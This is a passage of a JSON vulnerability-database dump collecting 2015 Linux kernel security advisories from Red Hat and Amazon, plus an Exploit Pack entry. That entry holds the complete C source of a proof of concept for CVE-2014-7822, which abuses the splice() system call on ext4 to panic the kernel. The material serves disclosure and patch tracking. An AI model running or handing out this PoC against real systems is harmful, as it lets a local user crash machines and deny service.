resource, and no manager thread\nexisted to create more workers. As a consequence, the running processes\nbecame unresponsive. With this update, the logic around manager creation\nhas been changed to assure that the last worker thread becomes a manager\nthread and does not start executing work items. Now, a manager thread\nexists, spawns new workers as needed, and processes no longer hang.\n(BZ#1197744)\n\n* If a thin-pool's metadata enters read-only or fail mode, for example, due\nto thin-pool running out of metadata or data space, any attempt to make\nmetadata changes such as creating a thin device or snapshot thin device\nshould error out cleanly. However, previously, the kernel code returned\nverbose and alarming error messages to the user. With this update, due to\nearly trapping of attempt to make metadata changes, informative errors are\ndisplayed, no longer unnecessarily alarming the user. (BZ#1197745)\n\n* When running Red Hat Enterprise Linux as a guest on Microsoft Hyper-V\nhypervisor, the storvsc module did not return the correct error code for\nthe upper level Small Computer System Interface (SCSI) subsystem. As a\nconsequence, a SCSI command failed and storvsc did not handle such a\nfailure properly under some conditions, for example, when RAID devices were\ncreated on top of storvsc devices. An upstream patch has been applied to\nfix this bug, and storvsc now returns the correct error code in the\ndescribed situation. (BZ#1197749)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.", "modified": "2018-07-10T18:08:41", "published": "2015-03-26T13:16:32", "id": "RHSA-2015:0726", "href": "https://access.redhat.com/errata/RHSA-2015:0726", "type": "redhat", "title": "(RHSA-2015:0726) Important: kernel security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:57", "bulletinFamily": "unix", "cvelist": ["CVE-2014-8159", "CVE-2015-1421"], "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's Infiniband subsystem did not\nproperly sanitize input parameters while registering memory regions from\nuser space via the (u)verbs API. A local user with access to a\n/dev/infiniband/uverbsX device could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-8159,\nImportant)\n\n* A use-after-free flaw was found in the way the Linux kernel's SCTP\nimplementation handled authentication key reference counting during INIT\ncollisions. A remote attacker could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2015-1421,\nImportant)\n\nRed Hat would like to thank Mellanox for reporting the CVE-2014-8159 issue.\nThe CVE-2015-1421 issue was discovered by Sun Baoliang of Red Hat.\n\nThe kernel-rt packages have been upgraded to version 3.10.0-229.1.2, which\nprovides a number of bug fixes over the previous version, including:\n\n- The kdump service could become unresponsive due to a deadlock in the\nkernel call ioapic_lock.\n\n- Attempt to make metadata changes such as creating a thin device or\nsnapshot thin device did not error out cleanly.\n\n(BZ#1203359)\n\nAll kernel-rt users are advised to upgrade to these updated packages, which\ncorrect these issues. The system must be rebooted for this update to take\neffect.", "modified": "2018-03-19T16:29:52", "published": "2015-03-26T13:17:14", "id": "RHSA-2015:0727", "href": "https://access.redhat.com/errata/RHSA-2015:0727", "type": "redhat", "title": "(RHSA-2015:0727) Important: kernel-rt security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:52", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1421", "CVE-2015-1805"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's SCTP\nimplementation handled authentication key reference counting during INIT\ncollisions. A remote attacker could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2015-1421,\nImportant)\n\n* It was found that the Linux kernel's implementation of vectored pipe read\nand write functionality did not take into account the I/O vectors that were\nalready processed when retrying after a failed atomic access operation,\npotentially resulting in memory corruption due to an I/O vector array\noverrun. A local, unprivileged user could use this flaw to crash the system\nor, potentially, escalate their privileges on the system. (CVE-2015-1805,\nImportant)\n\nThe CVE-2015-1421 issue was discovered by Sun Baoliang of Red Hat, and the\nsecurity impact of the CVE-2015-1805 issue was discovered by Red Hat.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "modified": "2015-06-10T11:13:52", "published": "2015-06-09T04:00:00", "id": "RHSA-2015:1082", "href": "https://access.redhat.com/errata/RHSA-2015:1082", "type": "redhat", "title": "(RHSA-2015:1082) Important: kernel security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 3.133.14 (Ubuntu) - splice() System Call Local Denial of Service", "edition": 1, "published": "2015-04-13T00:00:00", "title": "Linux Kernel 3.133.14 (Ubuntu) - splice() System Call Local Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7822"], "modified": "2015-04-13T00:00:00", "id": "EXPLOITPACK:93D47AC26E5DA900EF305FD8DD1D8904", "href": "", "sourceData": "/* ----------------------------------------------------------------------------------------------------\n * cve-2014-7822_poc.c\n * \n * The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file\n * which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call, \n * as demonstrated by use of a file descriptor associated with an ext4 filesystem. \n *\n * \n * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.\n * Works on ext4 filesystem\n * Tested on Ubuntu with 3.13 and 3.14 kernels\n * \n * Compile with gcc -fno-stack-protector -Wall -o cve-2014-7822_poc cve-2014-7822_poc.c \n * \n * \n * Emeric Nasi - www.sevagas.com\n *-----------------------------------------------------------------------------------------------------*/\n\n\n/* ----------------------- Includes ----------------------------*/\n\n#define _GNU_SOURCE\n#include <fcntl.h>\n#include <stdio.h>\n#include <unistd.h>\n#include <errno.h>\n#include <string.h>\n#include <stdlib.h>\n#include <limits.h>\n\n#define EXPLOIT_NAME \"cve-2014-7822\"\n#define EXPLOIT_TYPE DOS\n\n#define JUNK_SIZE 30000\n\n/* ----------------------- functions ----------------------------*/\n\n\n/* Useful:\n * \n+============+===============================+===============================+\n| \\ File flag| | |\n| \\ | !EXT4_EXTENTS_FL | EXT4_EXTETNS_FL |\n|Fs Features\\| | |\n+------------+-------------------------------+-------------------------------+\n| !extent | write: 2194719883264 | write: -------------- |\n| | seek: 2199023251456 | seek: -------------- |\n+------------+-------------------------------+-------------------------------+\n| extent | write: 4402345721856 | write: 17592186044415 |\n| | seek: 17592186044415 | seek: 17592186044415 |\n+------------+-------------------------------+-------------------------------+\n*/\n\n\n/**\n * Poc for cve_2014_7822 vulnerability\n */\nint main()\n{\n int pipefd[2];\n int result;\n int in_file;\n int out_file;\n int zulHandler;\n loff_t viciousOffset = 0;\n \n char junk[JUNK_SIZE] ={0};\n \n result = pipe(pipefd);\n \n // Create and clear zug.txt and zul.txt files\n system(\"cat /dev/null > zul.txt\");\n system(\"cat /dev/null > zug.txt\");\n \n // Fill zul.txt with A\n zulHandler = open(\"zul.txt\", O_RDWR);\n memset(junk,'A',JUNK_SIZE);\n write(zulHandler, junk, JUNK_SIZE);\n close(zulHandler);\n\n //put content of zul.txt in pipe\n viciousOffset = 0;\n in_file = open(\"zul.txt\", O_RDONLY);\n result = splice(in_file, 0, pipefd[1], NULL, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE);\n close(in_file);\n \n\n // Put content of pipe in zug.txt\n out_file = open(\"zug.txt\", O_RDWR); \n viciousOffset = 118402345721856; // Create 108 tera byte file... can go up as much as false 250 peta byte ext4 file size!!\n printf(\"[cve_2014_7822]: ViciousOffset = %lu\\n\", (unsigned long)viciousOffset);\n \n result = splice(pipefd[0], NULL, out_file, &viciousOffset, JUNK_SIZE , SPLICE_F_MORE | SPLICE_F_MOVE); //8446744073709551615\n if (result == -1)\n {\n printf(\"[cve_2014_7822 error]: %d - %s\\n\", errno, strerror(errno));\n exit(1);\n }\n close(out_file);\n\n close(pipefd[0]);\n close(pipefd[1]);\n \n \n //Open zug.txt \n in_file = open(\"zug.txt\", O_RDONLY);\n close(in_file);\n \n printf(\"[cve_2014_7822]: POC triggered, ... system will panic after some time\\n\");\n \n return 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:42", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7822", "CVE-2014-8989"], "description": "**Issue Overview:**\n\nThe Linux kernel through 3.17.4 does not properly restrict dropping of supplemental group memberships in certain namespace scenarios, which allows local users to bypass intended file permissions by leveraging a POSIX ACL containing an entry for the group category that is more restrictive than the entry for the other category, aka a \"negative groups\" issue, related to kernel/groups.c, kernel/uid16.c, and kernel/user_namespace.c. ([CVE-2014-8989 __](<https://access.redhat.com/security/cve/CVE-2014-8989>))\n\nA flaw was found in the way the Linux kernel's splice() system call validated its parameters. On certain file systems, a local, unprivileged user could use this flaw to write past the maximum file size, and thus crash the system. ([CVE-2014-7822 __](<https://access.redhat.com/security/cve/CVE-2014-7822>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum clean all_ followed by _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n perf-debuginfo-3.14.33-26.47.amzn1.i686 \n perf-3.14.33-26.47.amzn1.i686 \n kernel-tools-debuginfo-3.14.33-26.47.amzn1.i686 \n kernel-tools-devel-3.14.33-26.47.amzn1.i686 \n kernel-debuginfo-3.14.33-26.47.amzn1.i686 \n kernel-debuginfo-common-i686-3.14.33-26.47.amzn1.i686 \n kernel-devel-3.14.33-26.47.amzn1.i686 \n kernel-headers-3.14.33-26.47.amzn1.i686 \n kernel-3.14.33-26.47.amzn1.i686 \n kernel-tools-3.14.33-26.47.amzn1.i686 \n \n noarch: \n kernel-doc-3.14.33-26.47.amzn1.noarch \n \n src: \n kernel-3.14.33-26.47.amzn1.src \n \n x86_64: \n kernel-devel-3.14.33-26.47.amzn1.x86_64 \n kernel-tools-devel-3.14.33-26.47.amzn1.x86_64 \n perf-3.14.33-26.47.amzn1.x86_64 \n kernel-tools-3.14.33-26.47.amzn1.x86_64 \n kernel-3.14.33-26.47.amzn1.x86_64 \n kernel-headers-3.14.33-26.47.amzn1.x86_64 \n perf-debuginfo-3.14.33-26.47.amzn1.x86_64 \n kernel-tools-debuginfo-3.14.33-26.47.amzn1.x86_64 \n kernel-debuginfo-3.14.33-26.47.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-3.14.33-26.47.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2015-02-11T19:34:00", "published": "2015-02-11T19:34:00", "id": "ALAS-2015-476", "href": "https://alas.aws.amazon.com/ALAS-2015-476.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}